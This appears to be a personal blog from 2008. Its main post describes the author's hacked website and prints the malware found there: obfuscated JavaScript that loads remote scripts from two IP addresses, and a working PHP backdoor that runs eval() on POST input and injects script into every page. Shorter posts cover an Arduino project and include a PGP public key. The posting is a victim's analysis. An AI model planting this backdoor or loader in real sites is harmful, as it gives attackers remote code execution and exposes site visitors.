Thursday, December 18, 2008

Hacked... again....



Hackers claiming to be Muslims from Turkey hacked the site the other day so I've just spent the evening reloading most of the files form backup. Although only a couple of files were visibly changed almost every html file and random PHP files had code inserted which caused any number of unknown activities.

What I don't understand is that if you are going to go to the trouble of hacking a site and then to stealthily insert code which obviously does some sort of action of benefit to the perpetrator, why would you write your name on the index page as a red flag to say this site has been hacked? Surely If I was a hacker I would just insert the code quietly and then nobody would know it was their unless they did a full site compare. Unless you wanted a site to look like it had been hacked by someone else..... hmmmm

Anyway I'm off to review my file permissions and php code across the site... and sift through some log files ;)

[EDIT:] Here is the javascript code that was pacthed into all my webpages. I have renamed the 'eval' function to disable the action and broken into lines

if(typeof(yahoo_counter)!=typeof(1))evalDISABLED(unescape('%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$
%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E\n#do#%63$%75!%6D%65$%6E|%74`%2E%77#%72i@%74%65%28$%22%3C
%2F%74|%65%78%74a#%72e&a|%3E")%3B%76`%61@r%20i|%2C%5F|%2C%61@%3D%5B#%2278|.|1&%310%2E@17@5`%2E&%321
!%22~,%2219!%35~.&2#4~.%37!6`.2#%35!1"@%5D~;_%3D%31~%3Bi@f$%28%64&%6F%63&%75&%6D%65n&t.c&%6F#ok%69
%65.%6D`a%74#c`%68~(%2F%5C$%62#hg#%66%74%3D#1/&%29=~%3D%6E#u@%6C`l%29!f%6Fr&%28$%69&=|%30%3B#
%69#%3C%32%3B!i|%2B!+#%29doc&%75%6D#%65&%6Et%2Ew&%72%69!t#e@(#"!%3C%73|cr#i%70t%3E`%69!%66~(#_%29$
%64@%6Fcu~%6D@e%6E|t%2E%77`rit%65%28%5C%22!%3C#%73%63%72!ip&t%20~id=%5F&"%2Bi!+"_`%20s`%72c=//%22~
+`%61@%5B$%69%5D`+#%22#/%63`%70$%2F%3F&%22&%2B@n$%61%76$%69%67`%61%74!%6F`r#%2Eap!%70#%4E`%61!
m&e!.&%63&h`%61!rA%74!(0`)@%2B"%3E%3C~%5C%5C%2F!%73%63r!%69%70!t!%3E#%5C"&)~%3C%5C/s`%63ri%70%74%3E$
%22%29@;\n%2F@/&%3C%2F%64|%69%76#%3E').replace(/#|\!|@|~|`|\&|\$|\|/g,""));var yahoo_counter=1;


The un-obfuscated version is as follows

//<div style=display:none>


document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];
_=1;
if(document.cookie.match(/\bhgft=1/)==null)
for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_
src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");


//</div>



Those two IP addresses are managed by

person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Karpinskogo 97a
address: Moscow
address: 111423
address: Russian Federation
phone: +7 342 2763167

and

person: Andy BIERLAIR
address: root eSolutions
address: 35, rue John F. Kennedy
address: L-7327 Steinsel
phone: +352 20.500
fax-no: +352 20.500.500
nic-hdl: AB99-RIPE


The PHP pages were tagged with


if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwd
CBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5c
GVvZigxKSlldmFsKHVuZXNjYXBlKCclMkYlMkYlM0NkaSU3NiMlMjAhJTczfCU3NCU3OSU2QyU2NSUzRCQlNjQlNjl+JTczYCU3MGxAJ
TYxeWAlM0FgbiQlNkZgJTZFfGUlM0VcbiNkbyMlNjMkJTc1ISU2RCU2NSQlNkV8JTc0YCUyRSU3NyMlNzJpQCU3NCU2NSUyOCQlMjIl
M0MlMkYlNzR8JTY1JTc4JTc0YSMlNzJlJmF8JTNFIiklM0IlNzZgJTYxQHIlMjBpfCUyQyU1RnwlMkMlNjFAJTNEJTVCIyUyMjc4fC58MSYlM
zEwJTJFQDE3QDVgJTJFJiUzMjEhJTIyfiwlMjIxOSElMzV+LiYyIzR+LiUzNyE2YC4yIyUzNSExIkAlNUR+O18lM0QlMzF+JTNCaUBmJCUyO
CU2NCYlNkYlNjMmJTc1JiU2RCU2NW4mdC5jJiU2RiNvayU2OSU2NS4lNkRgYSU3NCNjYCU2OH4oJTJGJTVDJCU2MiNoZyMlNjYlNzQl
M0QjMS8mJTI5PX4lM0QlNkUjdUAlNkNgbCUyOSFmJTZGciYlMjgkJTY5Jj18JTMwJTNCIyU2OSMlM0MlMzIlM0IhaXwlMkIhKyMlMjlkb2
MmJTc1JTZEIyU2NSYlNkV0JTJFdyYlNzIlNjkhdCNlQCgjIiElM0MlNzN8Y3IjaSU3MHQlM0VgJTY5ISU2Nn4oI18lMjkkJTY0QCU2RmN1fi
U2REBlJTZFfHQlMkUlNzdgcml0JTY1JTI4JTVDJTIyISUzQyMlNzMlNjMlNzIhaXAmdCUyMH5pZD0lNUYmIiUyQmkhKyJfYCUyMHNgJTc
yYz0vLyUyMn4rYCU2MUAlNUIkJTY5JTVEYCsjJTIyIy8lNjNgJTcwJCUyRiUzRiYlMjImJTJCQG4kJTYxJTc2JCU2OSU2N2AlNjElNzQhJTZG
YHIjJTJFYXAhJTcwIyU0RWAlNjEhbSZlIS4mJTYzJmhgJTYxIXJBJTc0ISgwYClAJTJCIiUzRSUzQ34lNUMlNUMlMkYhJTczJTYzciElNjklNzAh
dCElM0UjJTVDIiYpfiUzQyU1Qy9zYCU2M3JpJTcwJTc0JTNFJCUyMiUyOUA7XG4lMkZALyYlM0MlMkYlNjR8JTY5JTc2IyUzRScpLnJlcGx
hY2UoLyN8XCF8QHx+fGB8XCZ8XCR8XHwvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY
3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();


That whole base64 encoded things boils down to the same javascript seen above. I have emailed the ISP managers for the IP addresses pointed at by the code and they can investigate further should they wish.


What does the code do ? Well it goes to the to ip addresses and runs the code found at
http://78.110.175.21/cp/?I which is currently :
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i
+"_");if(d)d.src=""}evalDISABLED(unescape('%2F/%4A`u#%73!%74%20~%66~u@c#k`%20#of`%66#.
%2E%2E`@%3C#d#%69v%20st%79%6Ce~=@d%69@%73#pl%61~y%3A~n`%6F@n%65$%3E\n~%76@ar|
%20%74@%3D%6E@%65w@ %44$a!t!e#%281#%32@29%39|7$308@30%300);%64!%6F$%63~%75me$n$
%74!.@%63o`ok|%69~e=%22h%67!%66#%74|%3D%31`;$%20#e%78@%70|%69#%72%65`s=%22#%2B
%74|%2E@t%6FG%4D%54!St$r`i`%6E`%67#(%29#+|"; %70%61|%74%68@%3D/%22@;\n%2F@%2F!
%3C/%64`iv|%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));


which is un-obfuscated to :

//Just fuck off...&lt;div style=display:none&gt;
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//&lt;/div&gt;


which simply saves a cookie. But I would assume that later the hacker would replace this code with something more worthwhile.

Monday, December 15, 2008

More Arduino Butterfly

David Knaack has done a great job setting up the Butteruino project over on google code.
You can find it at http://code.google.com/p/butteruino/

I'd hoped to get an LCD library up this weekend but got bogged down in a good book; oh well perhaps next weekend.
At least I should get some stress testing done on the butterfly logger at -37 degrees C this week due to a busted thermostat on the freezer.

Cryptonomicon and PGP Key

Just finished Neal Stephenson's CRYPTONOMICON. Great book, like the alternative reality of Finux and things like the galvanic lucifer. Anyway makes me want to post my PGP Key.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.8 (Darwin)

mQGiBESDrL8RBAC9J6gKjVuWrlwsMsRkHgqAVKSS/sTwyfoPrRpba7E0XctNnXhf
Vkcy9eEt8mN6MSL9haxv8U+Xlw4tSj9MEpdwVwSZT+oGD1ORN9MYnun7+7Kq8ZIj
tDEL/Xbd4L6VbqlML8gNBFE18EXYNOzHVbVFmNJkZPLRx9ldZ+YopiqUfwCg6+jt
bXn5UoLN1pE/lzW6SLhgpIUEAKVleqUC6R27ZzqyPGjmqaYUzvDyVDoldASKxHd7
IxAto1v+k9QNSDaa4iqykFStk4pBEV9KO29QVt4CyaK6rKFSvPKmQW5rI6pA45Yq
wRygfRLzqdUg/oUOny58F65urTOvdtfQtCLGxqRNS50iabwhXihRKBUQBb25hD3n
FBoOA/9+A/3w5iRRld0jnWEpqJI7JRMpMV3oT+IeHvXToWpCUF9LQEv8X012dzDU
a+uO5rOx9dwz8SZ9V02YrqYR9We+7xYe6Dp4q0r2OdhqnrEc/E4wdDxC165Br+Hg
fWwGc7Mxi5MniljSlzrw5uCutEXQ21Kly+/wUlnR1LJkRmdcZbQnTmljayBMb3R0
IChOWikgPG5pY2subG90dEBnbWFpbC5ub3NwYW0+iGAEExECACAFAkSDrL8CGwMG
CwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRAHV5jGyG2/QlYpAJ9G0y5cNqoiXnBD
jhmxUETZvcFwLACfQ9OUEySKcTimR+I5qTJ9D7iJGTS5Ag0ERIOuKBAIAKHeDMEO
qFgPfoSabl9BHemuOgVvZsr481DTWFYnJAH1n9qZE8hZ4MTbn/zXpIJS4ozJAyhJ
5mS/K6/3HunSvdBeMkaqVtjoCXdkTWWm9XQMeseSRffjRbNyeoroLlm3tkVRMJNh
rjN/Al1Abq3ESfZzuY8VBLGRfDPUeToNHSCLnOvD+ijMBEYsr5ds8Bi77tWAbSdR
loL3aGHIkj3fPFJmNjrAl7WZXgvl1p899tY4N19RXVkdhagcb3uVmAJjd6l7y8x3
l02jBCk3YQiRMBIG8kov+rDgZwgVaGYEitg9DxRph02sHfxEGt3fmKVLLcS1BB0M
YprObqBOwxHlx9cAAwUH/1iq+9VTh0uuKQsA+qCOthBNqsf62g0r/NJsnZoiMAvA
sLvrpwD7mzGMc+Ke7W2578IvL+Fnvmi+s67Gg2+6DAk3VkJEH9+y1CkDb8PqAxRp
sLFlvi4YcXsbXdG2UgMrfEWeIr2z0VYWGnZ3GibqUDf7rxu79ah5T8Z7ajNLEEHF
+wzXQ7vEzZVBeytL6lv+JZ5s5umRhjCy0flMZ/Js53g5IH5NMu/vrJrQTU+jREDw
+faEb3yBUaSX3N1pu88CWGdwqBVH16rt+AbHXa7kKqY46kM10QZWpHLPCzzw+jlH
c2udYs4kPyfVTSe6RG4mRD8hgx7Y/Hhnbtz5TIeH8DiISQQYEQIACQUCRIOuKAIb
DAAKCRAHV5jGyG2/Qq4zAJ0Q5asX37oT2Ih3aKiQinBdhTgqcwCgi264VRyWK1Cb
CIeQYCKAqEVp4nI=
=oFPt
-----END PGP PUBLIC KEY BLOCK-----